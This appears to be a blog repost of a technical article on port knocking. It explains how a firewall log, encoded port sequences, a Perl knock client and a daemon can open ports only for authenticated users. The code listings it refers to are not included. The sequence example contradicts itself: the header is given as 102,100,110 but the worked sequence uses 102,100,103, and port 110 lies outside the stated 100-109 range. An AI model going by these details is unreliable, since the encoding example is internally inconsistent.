Feb 12 00:13:27 ... input DENY eth1 PROTO=6 IPC:64138 IPF:100 ...
Feb 12 00:13:27 ... input DENY eth1 PROTO=6 IPC:64139 IPF:100 ...
Feb 12 00:13:28 ... input DENY eth1 PROTO=6 IPC:64140 IPF:103 ...
The knock sequence appears in the firewall log, and the user has transmitted data across the closed ports. Any implementation of the port knocking system needs to provide some basic functionality. First, some way to monitor the firewall log file needs to be devised. A simple Perl application that tails the file is presented in Listing 2, discussed more fully later in the article. Second, a method is required to extract the sequences of ports from the log file and translate their payload into usable information. In this step it is important to be able to (a) detect when a port sequence begins and ends, (b) correctly detect a port sequence in the presence of spurious connection attempts that are not part of the sequence and (c) keep track of multiple port sequences arriving at the same time from different remote IPs. The encoding used to generate the port sequence can be designed to minimize the length of the sequence. For example, the sequence 100,102 could correspond to one or a series of predefined operations (for example, open port ssh/22 for 15 minutes for a specific IP and then close the port). Finally, once the information is derived from the sequence, the implementation must provide some way to manipulate the firewall rules.
Benefits of Port Knocking
One of the key features of port knocking is it provides a stealthy method of authentication and information transfer to a networked machine that has no open ports. It is not possible to determine successfully whether the machine is listening for knock sequences by using port probes. Thus, although a brute-force attack could be mounted to try to guess the ports and the form of the sequence, such breach attempts could be detected easily. Second, because information is flowing in the form of connection attempts rather than in typical packet data payload, without knowing that this system is in place it would be unlikely that the use of this authentication method would be detected by monitoring traffic. To minimize the risk of a functional sequence being constructed by the intercepting party, the information content containing the remote IP of the sequence can be encrypted. Third, because the authentication is built into the port knock sequence, existing applications need not be changed. Implementing one-time passwords is done easily by adjusting the way particular sequences are interpreted. A sequence could correspond to a request that a port be opened for a specific length of time and then closed and never opened again to the same IP. Furthermore, a one-time pad could be used to encrypt the sequence, making it indecipherable by those without the pad.
Disadvantages of Port Knocking
To use port knocking, a client script that performs the knock is required. The client and any associated data should be considered a secret and kept on removable media, such as a USB key. The use of the client imposes an overhead for each connection. Certain locations, such as libraries or Internet cafés, may not allow execution of arbitrary programs. In order to use port knocking, a number of ports need to be allocated for exclusive use by this system. As the number of such ports increases, the knock sequences becomes shorter for a given amount of information payload, because the number of coding symbols is increased. Practically, 256 free privileged ports (in the 1-1024 range), not necessarily contiguous, usually can be allocated and used to listen for port knocks. Finally, any system that manipulates firewall rules in an automated fashion requires careful implementation. For the scenario in which no ports are initially open, if the listening dæmon fails or is not able to interpret the knocks correctly, it becomes impossible to connect remotely to the host.
In this section, three examples are outlined that illustrate how the port knocking system can be used. 1. Single Port, Fixed Mapping Connection to only one port (ssh/22) is required. The ssh dæmon is running; all privileged ports are closed, including ssh/22; and packets addressed to ports 30,31,32 are being logged. The following port sequences are recognized: 31,32,30 open ssh/22 to connecting IP
32,30,31 close ssh/22 to connecting IP
31,30,32 close ssh/22 to connecting IP and disregard further knocks from this IP
The justifiably paranoid administrator can open the ssh/22 port on his system by initiating TCP connections to ports 31,32,30. At the end of the ssh session, the port would be closed by using the second sequence shown above. If the host from which the administrator is connecting is not trusted (if, say, keystrokes may be snooped), the use of the third sequence would deny all further traffic from the IP, preventing anyone from duplicating the session. This assumes the port sequence and system login credentials are not captured by a third party and used before the legitimate session ends. In this example, only three sequences are understood by the system, as the requirements call for only a handful of well-defined firewall manipulations. The sequences were chosen not to be monotonically increasing (30, 31, 32), so they would not be triggered by remote port scans. If multiple ports are to be protected by this system, a mapping needs to be derived between the port sequence and a flexible firewall rule. This is covered in the next example. 2. Multiple Port, Dynamic Mapping In this example, a network may be running any number of applications. Ports 100-109 are used to listen to knocks. The port sequence is expected to be of the form: 102,100,110 10a,10b,10c,10d 10(a+b+c+d mod 10) 110,100,102
header payload checksum footer
The first and last three ports let the port knocking dæmon know that a sequence is starting and ending. The next four ports encode the port (abcd) to be opened. For example, if a connection to port 143 is required, the sequence would be 100,101,104,103. The final element in the sequence is a checksum that validates the sequence payload. In this example, the checksum is 8 (1+4+3 mod 10). The sequence element therefore is 108, and the full sequence would be 102,100,103 100,101,104,103 108 103,100,102
When this sequence is detected, port 143 would be made available to the incoming IP address. If the port is open already, the knock would rendered it closed. The knock can be extended to include additional information, such as an anticipated session length, that can be used to close the port after a set amount of time. 3. Mapping with Encryption The information contained in the knock sequence can be encrypted to provide an additional measure of security. In this example, 256 ports are allocated and logged. A knock map of the form remote IP port time checksum
is used where the remote IP, port, time and checksum (sum of other fields mod 255) are encrypted. The encrypted string can be mapped onto eight unsigned chars using Perl's pack("C*",STRING) command, see Listing 1. Listing 1. Mapping the Encrypted String
A minimal prototype Perl implementation of port knocking is presented. The implementation is comprised of a knockclient, responsible for originating the knock sequence, and a knockdæmon, responsible for monitoring the firewall log and manipulating the rules.
The complete client is shown in Listing 1. Lincoln Stein's Crypt::CBC module is used as proxy to Crypt::Blowfish to carry out encryption. The unencrypted knock sequence is comprised of seven values: four IP bytes, a port (limited to the range 0-255 in this implementation), a time flag and a checksum (mod 255). The time flag determines how the dæmon reacts: 0 to open the port, 255 to close the port and any other value in the 1-254 range to open the port and then close it after that many minutes. The knock on the firewall (IP=IPF) to open port ssh/22 on IP=IPC and then have the port close after 15 minutes would be executed by calling the client as follows: knockclient -i IPC -r IPF -p 22 -t 15
The client packs the list of seven integers, performs the encryption and unpacks the string into unsigned chars (0-255). These values are then mapped onto a sequence of ports in the 745-1000 range.
The knockdæmon is shown in Listing 2. This application uses File::Tail to look for new lines in the firewall log file. Lines corresponding to connection attempts to ports 745-1000 are parsed for the remote IP and port number. An 8-element queue storing the ports is maintained for each incoming IP. When the queue size reaches 8, its contents are decrypted. If the decryption is successful and the checksum is correct, appropriate action is taken and the queue is cleared. If the decryption fails, the oldest queue port element is removed and the dæmon continues monitoring. Listing 2. knockdæmon The firewall rules are manipulated by a system call to the ipchains binary, although the IPChains Perl module by Jonathan Schatz also may be used. If the port is to be closed, as indicated by the time flag, Jose Rodrigues' Schedule::At module is used to schedule the deletion of the rule using the at queue system.
Port knocking is a stealthy authentication system that employs closed ports to carry out identification of trusted users. This novel method provides the means of establishing a connection to an application running on a completely isolated system on which no ports initially are open.

made by rahuldutt

Blog Archive